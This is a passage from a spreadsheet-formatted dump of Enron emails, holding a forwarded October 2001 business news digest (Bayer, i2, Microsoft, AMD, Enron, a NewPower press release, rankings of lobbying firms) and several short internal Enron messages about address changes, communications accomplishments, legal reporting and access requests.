news - commentary) , the German chemical maker, which has seen its share pr=_x000D_
ice gain 10.4% since the terrorist attacks. But investors bidding up the st=_x000D_
ock might be getting ahead of themselves.=20_x000D_
Bayer makes Cipro, a leading treatment for anthrax. But while the demand fo=_x000D_
r Cipro is high, sales from the drug are only a small portion of the compan=_x000D_
y's overall revenue, which totaled 30.9 billion euros last year (and, accor=_x000D_
ding to analysts, will increase even more this year, due to its acquisition=_x000D_
 of Aventis CropScience, a crop protection and production company). To put =_x000D_
the demand for Cipro in context, J.P. Morgan expects U.S. sales of the drug=_x000D_
 to be approximately 1.2 billion euros for 2001.=20_x000D_
Even emergency purchases of Cipro probably won't add that much to Bayer's o=_x000D_
verall revenues. The president has asked for $643 million for antibiotics t=_x000D_
o combat bioterrorist attacks. While it's possible that sum will be increas=_x000D_
ed, not all the money would be spent on Cipro.=20_x000D_
Besides, it's not even clear that Bayer will remain the only producer of Ci=_x000D_
pro. Though the company holds the patent for the drug, there's some pressur=_x000D_
e in Congress for the government to purchase a generic version from other m=_x000D_
anufacturers.=20_x000D_
On another front, Bayer is currently battling a class-action lawsuit relate=_x000D_
d to an anti-cholesterol drug implicated in a number of deaths. It was forc=_x000D_
ed to withdraw the drug from the market.=20_x000D_
Bayer may offer protection against anthrax, but that doesn't mean it's a re=_x000D_
fuge for investors.=20_x000D_
2. Losses at Twice the Price_x000D_
You know things are bad for a company when its losses per share are double =_x000D_
the price of the shares themselves. That's the case for i2 Technologies (IT=_x000D_
WO:Nasdaq - news - commentary) , the supply-chain software maker. After mar=_x000D_
ket close on Tuesday, the company posted losses under generally accepted ac=_x000D_
counting principles that amounted to $5.5 billion, or $13.25 per share, for=_x000D_
 the latest quarter, including all charges.=20_x000D_
In other words, i2's losses were more than twice the value of its share pri=_x000D_
ce, which closed at $5.69 before the announcement.=20_x000D_
Much of the huge writedown reflects amortized goodwill from the purchase of=_x000D_
 Aspect Development in March 2000.=20_x000D_
To be fair, investors in companies that have made big acquisitions like i2 =_x000D_
typically focus on pro forma earnings, which exclude charges and extraordin=_x000D_
ary items. By that measure, i2's losses didn't look quite so bad: The compa=_x000D_
ny met analysts' consensus expectations with a loss of $55.3 million, or 13=_x000D_
 cents per share.=20_x000D_
Still, investors met i2's earnings with disapproval, knocking the stock dow=_x000D_
n 25% the day after they were reported.=20_x000D_
3. Microsoft's Bag of Tricks_x000D_
In times like these, there's comfort in knowing business goes on as usual a=_x000D_
t many U.S. companies. Just like the old days, Microsoft (MSFT:Nasdaq - new=_x000D_
s - commentary) is in the hot seat for its sharklike behavior toward a comp=_x000D_
etitor.=20_x000D_
It stands accused of sending 3,000 fake cereal boxes emblazoned with the wo=_x000D_
rds "Microsoft Server Crunch" to customers of rival server software maker N=_x000D_
ovell. The boxes, according to Novell, contained "a number of false and mis=_x000D_
leading statements" intended as putdowns of Novell products.=20_x000D_
Among the attempted insults were some not-so-clever plays on packaged food.=_x000D_
 For example, in a reference to Novell's flagship software product, a line =_x000D_
on the Microsoft boxes read: "What's the expiration date on that NetWare pl=_x000D_
atform?" (A round of applause, please, for those gut-splittingly funny engi=_x000D_
neers.)=20_x000D_
The boxes also said Novell is shifting its focus from software to consultin=_x000D_
g services, which Novell says isn't true.=20_x000D_
Microsoft spokesman Jim Desler said the cereal boxes were primarily intende=_x000D_
d to advertise Microsoft services, not to slight Novell. "It was all in the=_x000D_
 theme of a mock cereal box," he said. "It was a modest campaign."=20_x000D_
In response to Novell's complaints, he says Microsoft sent out a letter in =_x000D_
September to recipients of the boxes to clarify some of its statements, and=_x000D_
 it's just agreed to send another letter to appease the company. For the re=_x000D_
cord, Novell said it's not calling off its lawsuit for unspecified money da=_x000D_
mages.=20_x000D_
4. AMD's Feisty Pledge_x000D_
CEOs don't get their jobs by being eloquent, and it probably would be too m=_x000D_
uch to expect them to sound statesmanlike. But sometimes their oratorical r=_x000D_
ough edges cross the line into embarrassing.=20_x000D_
Case in point: Comments from Jerry Sanders, the CEO of Advanced Micro Devic=_x000D_
es (AMD:NYSE - news - commentary) , which earlier this week reported a loss=_x000D_
 for the first time in almost three years. The company, facing harsh pricin=_x000D_
g competition from Intel (INTC:Nasdaq - news - commentary) , said its reven=_x000D_
ue was down 22% from a year ago and it expects a likely operating loss for =_x000D_
the fourth quarter.=20_x000D_
Given recent declines in consumer confidence, the downturn is likely to be =_x000D_
extended by several quarters, Sanders admitted. But in a conference call, h=_x000D_
e indulged in some spirited fist-shaking. Citing the company's so-called "H=_x000D_
ammer" architecture for processors, Sanders declared, "We feel that when th=_x000D_
e upturn comes, we're going to kick ---."=20_x000D_
Does this guy carry around a surfboard in his car or what? Mr. Sanders, mee=_x000D_
t Mr. Reeves.=20_x000D_
OK, so we actually kind of admire Sanders' never-capitulate spirit. But his=_x000D_
 comment seems a little redundant, because just about everybody will look b=_x000D_
etter when the economy turns around. Because that may not be anytime soon, =_x000D_
what matters is how companies weather the interim -- feisty pledges notwith=_x000D_
standing.=20_x000D_
5. Enron's Rabbit-From-a-Hat Style_x000D_
Analysts have complained for some time about Enron's (ENE:NYSE - news - com=_x000D_
mentary) rabbit-from-a-hat style accounting, with which the company produce=_x000D_
d results that wowed investors without making it quite clear where they cam=_x000D_
e from. Now that its business has taken a sour turn, that tendency has gott=_x000D_
en even more unsettling.=20_x000D_
To cap off its disappointing earnings results this week -- Enron posted a s=_x000D_
teep loss after taking a $1.01 billion charge -- the company let drop that =_x000D_
its shareholder equity had decreased by $1.2 billion.=20_x000D_
In a conference call, CEO Kenneth Lay attributed the reduction in equity to=_x000D_
 the "removal of an obligation to issue a number of shares." According to a=_x000D_
 report in The Wall Street Journal, Enron repurchased 55 million shares iss=_x000D_
ued through a series of transactions involving LJM Capital, a partnership t=_x000D_
hat until recently was headed up by Enron's CFO.=20_x000D_
TSC's Peter Eavis has written that it appears Enron lent LJM money to buy E=_x000D_
nron stock.=20_x000D_
Ironically, the company boasted in its earnings release this week that it h=_x000D_
ad expanded reporting of its financial results, presumably to quiet its acc=_x000D_
ounting critics.=20_x000D_
Enron's transactions have been so labyrinthine that it's hard to identify e=_x000D_
xactly if or how they were inappropriate. But the latest revelation, to say=_x000D_
 the least, does nothing to bolster the company's credibility. Enron, whose=_x000D_
 CEO resigned unexpectedly in August, had seen its stock fall 59% for the y=_x000D_
ear leading up to its latest earnings release. Since then, it's dropped ano=_x000D_
ther 12.6%=20_x000D_
_x000D_
_x000D_
The New Power Company Revises Its Netting Agreement With Enron; Provides Fo=_x000D_
r Receivables and Inventory Financing_x000D_
_x000D_
10/19/2001_x000D_
Business Wire_x000D_
(Copyright (c) 2001, Business Wire)_x000D_
_x000D_
PURCHASE, N.Y.--(BUSINESS WIRE)--Oct. 19, 2001--The New Power Company ("New=_x000D_
Power"), a wholly owned subsidiary of NewPower Holdings, Inc. (NYSE: NPW) t=_x000D_
oday filed a Form 8-K with the Securities and Exchange Commission reporting=_x000D_
 that it has revised its master netting agreement with Enron North America =_x000D_
Corp., Enron Energy Services, Inc., and Enron Power Marketing, Inc. (togeth=_x000D_
er, the "Enron Subsidiaries").=20_x000D_
The amendment affects the Master Cross-Product Netting, Setoff, and Securit=_x000D_
y Agreement (the "Master Netting Agreement") among NewPower and the Enron S=_x000D_
ubsidiaries, and expands through January 4, 2002, the types of collateral t=_x000D_
hat NewPower is permitted to post to the Enron Subsidiaries._x000D_
The effect of the amendment is to reduce, through January 4, 2002, the amou=_x000D_
nt of cash collateral that NewPower is required to post to the Enron Subsid=_x000D_
iaries. Under the amended Master Netting Agreement, the first $70 million o=_x000D_
f posted collateral must be in the form of cash, while amounts in excess of=_x000D_
 $70 million may consist of not more than $40 million of eligible receivabl=_x000D_
es and inventory of NewPower, valued at discounts specified in the amendmen=_x000D_
t, and subject to a $25 million limit for October 2001. Pledging receivable=_x000D_
s and inventory is consistent with NewPower's previously announced intentio=_x000D_
n to secure asset-backed financing.=20_x000D_
With the amendment and NewPower's cost reduction efforts, and absent a simi=_x000D_
lar rate of decline in commodity prices or other significant events, NewPow=_x000D_
er believes that it has sufficient financial resources to conduct its busin=_x000D_
ess until it secures ongoing asset-backed financing, which will be necessar=_x000D_
y upon the expiration of the amendment. NewPower has been and is actively s=_x000D_
eeking to arrange asset-backed financing with other parties, although to da=_x000D_
te no such arrangements have been secured.=20_x000D_
The Company expects to meet its previous estimate of net loss and loss per =_x000D_
basic and diluted share for the third quarter ended September 30, 2001. How=_x000D_
ever, customer count and revenues are expected to be slightly lower than pr=_x000D_
eviously forecast.=20_x000D_
The Company will provide revised guidance for the fourth quarter 2001 and a=_x000D_
n outlook for 2002 on its third quarter conference call scheduled for Thurs=_x000D_
day, November 8.=20_x000D_
_x000D_
Cautionary Statement=20_x000D_
_x000D_
This press release contains certain forward-looking statements within the m=_x000D_
eaning of the Private Securities Litigation Reform Act of 1995, Section 27A=_x000D_
 of the Securities Act of 1933, and Section 21E of the Securities Exchange =_x000D_
Act of 1934. These statements involve risks and uncertainties and may diffe=_x000D_
r materially from actual future events or results. Although we believe that=_x000D_
 our expectations are based on reasonable assumptions, we can give no assur=_x000D_
ance that our goals will be achieved. The Company undertakes no obligation =_x000D_
to publicly release any revisions to these forward-looking statements to re=_x000D_
flect events or circumstances after the date hereof or to reflect the occur=_x000D_
rence of unanticipated events. Important factors that could cause actual re=_x000D_
sults to differ from estimates or projections contained in the forward-look=_x000D_
ing statements include our limited operating history; delays or changes in =_x000D_
the rules for the restructuring of the electric and natural gas markets; ou=_x000D_
r ability to attract and retain customers; our ability to manage our energy=_x000D_
 requirements and sell energy at a sufficient margin given the volatility i=_x000D_
n prices for electricity and natural gas; the effect of commodity volatilit=_x000D_
y on collateral requirements and liquidity; our dependence on third parties=_x000D_
 to provide critical functions to us and to our customers; and conditions o=_x000D_
f the capital markets affecting the availability of capital. Readers are re=_x000D_
ferred to the Company's Annual Report on Form 10-K for the year ending Dece=_x000D_
mber 31, 2000 and our Registration Statement on Form S-1 (No. 333.41412) on=_x000D_
 file with the Securities and Exchange Commission for a discussion of facto=_x000D_
rs that could cause actual results to differ materially from these forward-=_x000D_
looking statements.=20_x000D_
_x000D_
About NewPower Holdings, Inc.=20_x000D_
_x000D_
NewPower Holdings, Inc. (NYSE: NPW), through its subsidiary, The New Power =_x000D_
Company, is the first national provider of electricity and natural gas to r=_x000D_
esidential and small commercial customers in the United States. The Company=_x000D_
 offers consumers in restructured retail energy markets competitive energy =_x000D_
prices, pricing choices, improved customer service and other innovative pro=_x000D_
ducts, services and incentives._x000D_
_x000D_
_x000D_
CONTACT: The New Power Company Investors Kathryn Corbally, 914/697-2444 Kat=_x000D_
hryn.Corbally@newpower.com Patrick McCoy, 914/697-2431 Manager, Investor Re=_x000D_
lations pmccoy@newpower.com Media Gael Doar, 914/697-2451 gdoar@newpower.co=_x000D_
m Terri Cohen, 914/697-2457 Terri.Cohen@newpower.com=20_x000D_
08:32 EDT OCTOBER 19, 2001=20_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
_x000D_
_x000D_
LOBBYING_x000D_
K Street's Top 10: The Shifting Lineup_x000D_
Shawn Zeller_x000D_
_x000D_
10/20/2001_x000D_
National Journal_x000D_
Copyright 2001 by National Journal Group Inc. All rights reserved._x000D_
_x000D_
How do the Washington lobbying firms with the heftiest incomes put themselv=_x000D_
es in the upper echelon of K Street practitioners? Van Scoyoc Associates In=_x000D_
c. does it by signing up a stable of smaller clients and working hard to re=_x000D_
tain them. Quinn Gillespie &amp; Associates doesn't have a long client list, bu=_x000D_
t it is at the top of the heap in terms of average fee per client. Greenber=_x000D_
g Traurig, meanwhile, lured away a rival firm's top rainmaker-and his lucra=_x000D_
tive book of clients.=20_x000D_
These are just some of the business strategies revealed in National Journal=_x000D_
's survey of the 10 Washington lobbying firms with the highest fee income f=_x000D_
rom January 1 to June 30. The four top firms at midyear 2001 are the same o=_x000D_
nes as a year earlier: perennial powerhouses Cassidy &amp; Associates Inc.; Pat=_x000D_
ton Boggs; Akin, Gump, Strauss, Hauer &amp; Feld; and Verner, Liipfert, Bernhar=_x000D_
d, McPherson and Hand._x000D_
But two new players-boasting huge growth rates-are among the firms nipping =_x000D_
at the heels of these top dogs.=20_x000D_
Greenberg Traurig, which came in at No. 5 in National Journal's midyear 200=_x000D_
1 rankings, had never before been in the top tier of Washington lobbying fi=_x000D_
rms. According to PoliticalMoneyLine, which compiles a comprehensive annual=_x000D_
 list of all lobbying firms, Greenberg Traurig had the 35th-highest income =_x000D_
during the first six months of last year.=20_x000D_
And No. 7 in the midyear 2001 rankings is Quinn Gillespie, another first-ti=_x000D_
me member of the top 10. Formed just a year and a half ago by former Clinto=_x000D_
n White House Counsel Jack Quinn and Ed Gillespie-a one-time adviser to Hou=_x000D_
se Majority Leader Dick Armey, R-Texas-the firm has seen its fortunes rocke=_x000D_
t upward. Quinn Gillespie was No. 13 in the first six months of 2000.=20_x000D_
In between these two newcomers is Van Scoyoc Associates, ranked at No. 6. T=_x000D_
here has been a steady rise for Van Scoyoc, which was No. 28 in fee income =_x000D_
at the end of 1996, the year in which the 1995 Lobbying Disclosure Act firs=_x000D_
t took effect.=20_x000D_
Rounding out the top 10 at midyear 2001 are stalwarts Williams &amp; Jensen; Wa=_x000D_
shington Council Ernst &amp; Young; and Barbour Griffith &amp; Rogers.=20_x000D_
National Journal ranks the top-10 lobbying firms every six months by tallyi=_x000D_
ng the fees that firms report to the House and Senate as required under the=_x000D_
 1995 legislation. National Journal tabulates total fees for only the 25 to=_x000D_
p firms in PoliticalMoneyLine's comprehensive annual survey.=20_x000D_
With its $16.68 million in fees for the first six months of the year, Cassi=_x000D_
dy &amp; Associates continued to blow away the competition. The last time any f=_x000D_
irm reported a six-month total larger than Cassidy's was during the first h=_x000D_
alf of 1998, when Verner, Liipfert led the way. During the first six months=_x000D_
 of this year, Cassidy &amp; Associates received a massive fee of $1 million fr=_x000D_
om the Taiwan Studies Institute, a think tank with close ties to the Taiwan=_x000D_
ese government; Boeing Co. paid Cassidy &amp; Associates $600,000; and Tiffany =_x000D_
&amp; Co. paid it $400,000 to lobby on legislation that would bar diamonds mine=_x000D_
d in conflict-ridden areas of the world from entering the global market.=20_x000D_
Despite the economic downturn and the terrorist threat, lobbying goes on, c=_x000D_
ompany Chairman Gerald S.J. Cassidy said. "During difficult times, people c=_x000D_
ome to Washington with their problems. During more-robust times, they come =_x000D_
seeking opportunities."=20_x000D_
But the biggest story at midyear was the rise of Greenberg Traurig. The fir=_x000D_
m, which posted just $1.71 million in lobbying fees during the first half o=_x000D_
f 2000, saw that amount more than quadruple to nearly $8.7 million this yea=_x000D_
r. Much of the credit goes to Jack Abramoff, the conservative K Street move=_x000D_
r and shaker who is an ally of House Majority Whip Tom DeLay, R-Texas. Last=_x000D_
 year, Abramoff left his old firm, Preston Gates Ellis &amp; Rouvelas Meeds, an=_x000D_
d brought $3 million in business with him to Greenberg Traurig. Preston Gat=_x000D_
es, which was ranked in the top five during Abramoff's tenure, dropped out =_x000D_
of National Journal's rankings this year. The lobbying firm's fees fell by =_x000D_
nearly 50 percent.=20_x000D_
Abramoff continued to make rain at Greenberg Traurig, billing $860,000 to t=_x000D_
he Mississippi Band of Choctaw Indians, $500,000 to the Commonwealth of the=_x000D_
 Northern Mariana Islands, and $300,000 to garment manufacturers that opera=_x000D_
te in that U.S. territory. A few new clients also forked over big bucks: th=_x000D_
e Coushatta Tribe of Louisiana ($440,000); Voor Huisen Project Management, =_x000D_
a homebuilder with international operations ($300,000); and the American In=_x000D_
ternational Center ($100,000). Despite initial concerns among some Greenber=_x000D_
g Traurig partners about whether Abramoff would fit in, Abramoff insists th=_x000D_
at his team of lobbyists has been "totally integrated" into the firm.=20_x000D_
But Abramoff wasn't the only one responsible for Greenberg Traurig's higher=_x000D_
 earnings. Ronald W. Kleinman, a former State Department lawyer, persuaded =_x000D_
Congress with the help of several Greenberg Traurig colleagues to pass Sect=_x000D_
ion 2002 of the 2000 Victims of Trafficking and Violence Protection Act. Th=_x000D_
is section of the law ordered the Treasury Secretary to use Cuban governmen=_x000D_
t funds that are frozen in U.S. banks to compensate the families of three m=_x000D_
en who had won multimillion-dollar judgments against Cuba under a 1996 amen=_x000D_
dment to the Foreign Sovereignty Immunities Act. The amendment allows victi=_x000D_
ms of terrorism or their families to sue states that are on the U.S. list o=_x000D_
f state sponsors of terrorism.=20_x000D_
Greenberg Traurig represented the families of Armando Alejandre, Carlos Alb=_x000D_
erto Costa, and Mario M. de la Pena-three members of Brothers to the Rescue=_x000D_
, a Cuban-American group that rescues Cubans in the waters off Florida. The=_x000D_
 three men died when their plane was shot down over international waters on=_x000D_
 February 24, 1996. The families sued Cuba and were awarded $96.7 million i=_x000D_
n damages by a U.S. District Court judge in 1997. The State Department oppo=_x000D_
sed payment, but President Clinton signed the trafficking bill. Greenberg T=_x000D_
raurig reported a fee of $4 million.=20_x000D_
Fred W. Baggett, the chair of Greenberg Traurig's governmental practice gro=_x000D_
up, said this was a one-time fee, but he added that the Cuban case "establi=_x000D_
shed a platform so that the firm can support undertaking those one-time eff=_x000D_
orts in the future," and noted, "We have a few coming down the pipeline."=_x000D_
=20_x000D_
Baggett said the firm has cases involving an American killed in Jerusalem b=_x000D_
y the Palestinian group Hamas, and Americans who were used as human shields=_x000D_
 in Iraq during the Persian Gulf War. None of the Americans was killed, and=_x000D_
 all were eventually released.=20_x000D_
Taking the flip side of the mega-fee approach was Van Scoyoc Associates, wh=_x000D_
ich reported receiving no fee above $180,000. Nonetheless, the firm continu=_x000D_
ed its steady rise. A key reason, said firm President H. Stewart Van Scoyoc=_x000D_
, was the ability to recruit and retain clients. The firm signed up 34 clie=_x000D_
nts between January 1 and June 30, while only nine out of 159 clients termi=_x000D_
nated contracts during the period.=20_x000D_
"We work hard at defining the relationship with a client before we sign a c=_x000D_
ontract," said Van Scoyoc. "We make sure we're clear on the goals and objec=_x000D_
tives, and in a typical relationship, we don't guarantee that we can do eve=_x000D_
rything." The firm's $6.24 million total for the first half of 2001 was 23 =_x000D_
percent higher than its fees for the same period last year.=20_x000D_
Quinn Gillespie's ascent into the top 10 was more along the lines of Greenb=_x000D_
erg Traurig's. Quinn Gillespie's billings were almost $6.09 million at midy=_x000D_
ear 2001, a 71 percent rise over the same period last year. The firm has on=_x000D_
ly 34 paying clients, but the average fee per client-$180,000-is the highes=_x000D_
t among the top 10. During the six months, the British Columbia Lumber Trad=_x000D_
e Council paid a fee of $540,000 to Quinn Gillespie, while Enron Corp. paid=_x000D_
 $525,000. The Canadian group hoped its high-powered lobbyists would win gr=_x000D_
eater access for Canadian lumber in the United States, but U.S. tariffs wer=_x000D_
e reinstated earlier this year. Lobbying for Enron focused on energy deregu=_x000D_
lation, particularly in California. Enron is a major creditor of Southern C=_x000D_
alifornia Edison, the utility whose financial woes resulted in power shorta=_x000D_
ges in California last summer.=20_x000D_
Quinn Gillespie's staff has grown from nine at the time of the founding to =_x000D_
nearly 30 today. "We like to think we have a toolbox here-people who may be=_x000D_
 Republicans or Democrats but who also have different skills that benefit t=_x000D_
he client," Quinn said.=20_x000D_
Patton Boggs had fees of $10.26 million in the first six months of 2001, bu=_x000D_
t that was just a 5 percent rise over the same period in 2000. Still, the f=_x000D_
irm leapfrogged over Verner, Liipfert to capture the No. 2 ranking. Patton =_x000D_
Boggs earned $360,000 from Russia's government-owned NTV television network=_x000D_
, which was at the center of a controversy earlier this year when the gover=_x000D_
nment took over the independent network and ousted its staff.=20_x000D_
Akin, Gump also jumped past Verner, Liipfert to No. 3 in the rankings, post=_x000D_
ing $9.48 million in fees-a 16 percent increase over a year earlier. Akin, =_x000D_
Gump's biggest client was the troubled tire manufacturer Bridgestone/Firest=_x000D_
one Inc., which paid just over $1.5 million in fees. Akin, Gump also earned=_x000D_
 big money from AT&amp;T ($800,000) and the Gila River Indian Community ($620,0=_x000D_
00).=20_x000D_
At No. 4, Verner, Liipfert saw the biggest drop in fees, taking in $8.84 mi=_x000D_
llion in the first six months of 2001-down 16 percent from the same period =_x000D_
in 2000. Verner, Liipfert lost lucrative contracts with Puerto Rico after t=_x000D_
he government there changed hands last year. (See this issue, p. 3273.)=20_x000D_
Rounding out the top-10 rankings, Williams &amp; Jensen at No. 8 billed $5.68 m=_x000D_
illion, a 12 percent increase over the first half of 2000, while Washington=_x000D_
 Council Ernst &amp; Young saw its fees drop 11 percent to $5.5 million. The fi=_x000D_
rm fell four places to No. 9 in the rankings. Barbour Griffith &amp; Rogers's f=_x000D_
ee income was up 7 percent to $5.48 million, putting the firm at No. 10.=20_x000D_
Falling out of the midyear top-10 rankings were Preston Gates-No. 6 at midy=_x000D_
ear 2000-and PricewaterhouseCoopers, No. 7 last year. PricewaterhouseCooper=_x000D_
s's billings were $5 million for the period, a 6 percent drop from the firs=_x000D_
t half of 2000._x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. =09_x000D_
_x000D_
Oct. 19, 2001_x000D_
Houston Chronicle_x000D_
Houston entrepreneurs added to Texas Business Hall of Fame=20_x000D_
By TOM FOWLER=20_x000D_
Copyright 2001 Houston Chronicle=20_x000D_
The Texas Business Hall of Fame's annual awards ceremony Thursday night hon=_x000D_
ored four Houston business leaders.=20_x000D_
The event at the George R. Brown Convention Center put the spotlight on Wei=_x000D_
ngarten Realty Investors Chairman Stanford Alexander; Compaq Computer found=_x000D_
er and former Chief Executive Officer Rod Canion; retired Reliant Energy Ch=_x000D_
airman and CEO Don Jordan; and Dynegy Chairman and CEO Chuck Watson.=20_x000D_
This is the 19th year the nonprofit Texas Business Hall of Fame Foundation =_x000D_
has honored the state's business leaders with a dinner and induction event.=_x000D_
=20_x000D_
As chairman of Weingarten Realty Investors, Stanford Alexander built the co=_x000D_
mpany into one of the nation's largest publicly traded real estate companie=_x000D_
s.=20_x000D_
After serving in the U.S. Air Force, Alexander joined J. Weingarten, a Hous=_x000D_
ton-based chain of 87 supermarkets. He later became an executive with Weing=_x000D_
arten Markets Realty Co., an affiliated real estate firm that developed fre=_x000D_
e-standing supermarket stores.=20_x000D_
The firm later changed its name to Weingarten Realty. The Houston-based com=_x000D_
pany is now publicly traded on the New York Stock Exchange.=20_x000D_
Weingarten owns shopping centers, warehouses and other property in 17 state=_x000D_
s from coast to coast.=20_x000D_
Weingarten's notable developments in Houston include the upscale Village Ar=_x000D_
cade near Rice University and the Centre at Post Oak, across from the Galle=_x000D_
ria.=20_x000D_
Rod Canion came up with the idea behind Compaq in 1982 after a trip to a lo=_x000D_
cal ComputerLand store. Along with colleagues from Texas Instruments, Jim H=_x000D_
arris and industrial designer Ted Papajohn, Canion envisioned a portable co=_x000D_
mputer that ran all the programs that operated on the IBM PC.=20_x000D_
By the next year, the company was producing the original Compaq luggable co=_x000D_
mputer, a move that essentially created the modern PC industry. By 1987, it=_x000D_
s fifth year, the company made business history by breaking $1 billion in s=_x000D_
ales, the fastest pace ever for a corporate startup.=20_x000D_
Canion left Compaq in October 1991 but continued to be active in other vent=_x000D_
ures. In 1992, he founded Insource Technology Group, a consulting services =_x000D_
and network engineering firm, and continues to serve </t>
  </si>
  <si>
    <t>Thu, 30 Mar 2000 17:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ect.admin@enron.com'})</t>
  </si>
  <si>
    <t>We are one @enron.com!_x000D_
_x000D_
Please be aware of the following senders were automatically notified to (a). _x000D_
stop sending internet mail to your @ect.enron.com address and to (b). send _x000D_
future internet communications to Tana.Jones@enron.com :_x000D_
_x000D_
janetgj@erols.com_x000D_
_x000D_
REMINDER :_x000D_
Your @ect.enron.com address should not be used any longer and will be _x000D_
deactivated soon.  So please make sure these contacts switch to your new _x000D_
@enron.com address.  If you have subscribed to mailing lists, please make _x000D_
sure to update your addresses there as well._x000D_
AND_x000D_
Your shortname@enron.com address (i.e. jsmith@enron.com) will continue to _x000D_
work, even though your formal address is longname@enron.com (i.e. _x000D_
john.smith@enron.com)_x000D_
_x000D_
Please do not reply to this message as it was automatically generated.</t>
  </si>
  <si>
    <t>Thu, 20 Jul 2000 10:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>accomplishments</t>
  </si>
  <si>
    <t xml:space="preserve">First Half 2000 Accomplishments for Corporate Communications Team_x000D_
_x000D_
Media_x000D_
Major feature stories in Fortune, Forbes (cover), BusinessWeek, Financial _x000D_
Times, Bloomberg Magazine, Context, Red Herring, Business 2.0, Worth, The _x000D_
Standard, Wired, The Motley Fool, CBS MarketWatch, The New York Times, and _x000D_
others._x000D_
_x000D_
Blunted potentially negative stories surrounding Orange County, Cal PX, _x000D_
campaign contributions._x000D_
_x000D_
Initiated "new media" program with great results.  (Cover story working in _x000D_
ComputerWorld)_x000D_
_x000D_
Enron's media relations team is one of the most respected in media circles._x000D_
_x000D_
Advertising_x000D_
Roll out of "Ask Why" campaign._x000D_
_x000D_
Creation of Armchair Brand Management program, to be introduced mid August._x000D_
_x000D_
Direction of new creative (EOL and Weather Derivatives) for campaign_x000D_
_x000D_
Murray Gell-Man webcast_x000D_
_x000D_
Internal Communications_x000D_
Made internal communications less about newsletters and more about knowledge._x000D_
_x000D_
Launched e-Biz.  Two editions under our belt.  More stories, more info, once _x000D_
each week versus once every two months._x000D_
_x000D_
Massive development of E-Speak platform. Volume has been tripling on a _x000D_
monthly basis.   It is viewed, internally and externally, as the premier _x000D_
internal communications medium.  Ken Lay won "Executive Communicator of the _x000D_
Year" from IABC based on success of E-Speak.  Now working on popular outside _x000D_
speakers, a new site called eMeeting, and other great stuff._x000D_
 _x000D_
Hold Music!_x000D_
_x000D_
Video in the elevators, and other jobs in support of Vision and Values _x000D_
campaign._x000D_
_x000D_
Other_x000D_
Best Annual Report We Ever Did.  (Institutional Investor thought so, too.)_x000D_
_x000D_
MG plc Acquisition_x000D_
_x000D_
Personnel moves in EEL and EBS._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 02:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Azurix Legal Integration</t>
  </si>
  <si>
    <t xml:space="preserve">pls print.  thanks df_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 03/29/2001 _x000D_
10:51 AM ---------------------------_x000D_
_x000D_
John Ale@AZURIX_x000D_
_x000D_
03/29/2001 08:55 AM_x000D_
_x000D_
To: Michael P Moran/Enron@EnronXGate, Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Azurix Legal Integration_x000D_
_x000D_
In advance of our meeting this afternoon, I thought I'd put out a few agenda _x000D_
topics_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 09:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>BETA Form</t>
  </si>
  <si>
    <t>Tana -_x000D_
_x000D_
Consistent with our discussions and the feedback from Bob, attached is an _x000D_
updated form of the BETA to be used for BrokerClient.  This form goes with _x000D_
the form Fee Agreement I forwarded last week and should be used on all _x000D_
BrokerClient deals going forward._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark_x000D_
Senior Counsel, EWS_x000D_
Phone:     713-345-8897_x000D_
Facsimile: 713-646-3490_x000D_
E-Mail:      Mark.Greenberg@enron.com</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 03:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Do not know, if she drives we may go off campus.  She likes to go out.  But _x000D_
may stay here. I will let you know._x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Wed, 16 Jan 2002 21:00:07 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for christine.mcevoy@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because the requester specified you as their Manager. Please click http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000081116&amp;Page=Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000081116_x000D_
Request Create Date : 1/16/02 3:00:02 PM_x000D_
Requested For       : christine.mcevoy@enron.com_x000D_
Resource Name       : Unlisted Desktop Application_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 06:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Legal Reporting</t>
  </si>
  <si>
    <t xml:space="preserve">The top ten legal risk report for EGM is new.  It should help focus attention _x000D_
on the most significant legal risks.  Mark_x000D_
_x000D_
_x000D_
_x000D_
	Jeffrey A Shankman_x000D_
	10/23/2000 05:32 PM_x000D_
		_x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Legal Reporting_x000D_
_x000D_
I'll defer to you.  How does this supplement your reports now?_x000D_
_x000D_
_x000D_
_x000D_
Mark E Haedicke_x000D_
10/23/2000 04:38 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT, Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Legal Reporting_x000D_
_x000D_
_x000D_
Mike and Jeff:_x000D_
_x000D_
I am rethinking the legal reports.  Alan and I am preparing a monthly trading _x000D_
and transactional summary, a litigation report and the TOP TEN legal risk _x000D_
report.  To me the last two are the most important.  On a conceptual basis, _x000D_
is that what you need or want to see?_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
